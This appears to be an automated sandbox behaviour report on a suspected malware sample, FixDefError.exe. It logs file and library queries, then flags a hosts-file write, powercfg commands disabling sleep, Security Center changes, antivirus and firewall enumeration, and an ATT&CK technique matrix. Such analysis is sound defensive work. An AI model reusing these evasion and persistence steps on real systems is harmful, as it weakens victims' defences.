      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\ProgramData\RuntimeBrokerData\RegSvc.exe VolumeInformation
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Modifies power options to not sleep / hibernate
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Modifies the hosts file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Changes security center settings (notifications, updates, antivirus, firewall)
      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
      Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
      Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
      Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
      Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
      Source: svchost.exe, 00000047.00000002.516627565.0000029D68640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: svchost.exe, 00000047.00000002.516940028.0000029D68702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts121
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      File and Directory Permissions Modification      		OS Credential Dumping1
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium1
      Web Service      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Command and Scripting Interpreter      		1
      Windows Service      		1
      Windows Service      		11
      Disable or Modify Tools      		LSASS Memory13
      System Information Discovery      		Remote Desktop Protocol1
      Clipboard Data      		Exfiltration Over Bluetooth1
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Scheduled Task/Job      		1
      Scheduled Task/Job      		11
      Process Injection      		1
      Deobfuscate/Decode Files or Information      		Security Account Manager231
      Security Software Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
      Encrypted Channel      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts1
      PowerShell      		Logon Script (Mac)1
      Scheduled Task/Job      		2
      Obfuscated Files or Information      		NTDS1
      Process Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer2
      Non-Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
      Software Packing      		LSA Secrets131
      Virtualization/Sandbox Evasion      		SSHKeyloggingData Transfer Size Limits13
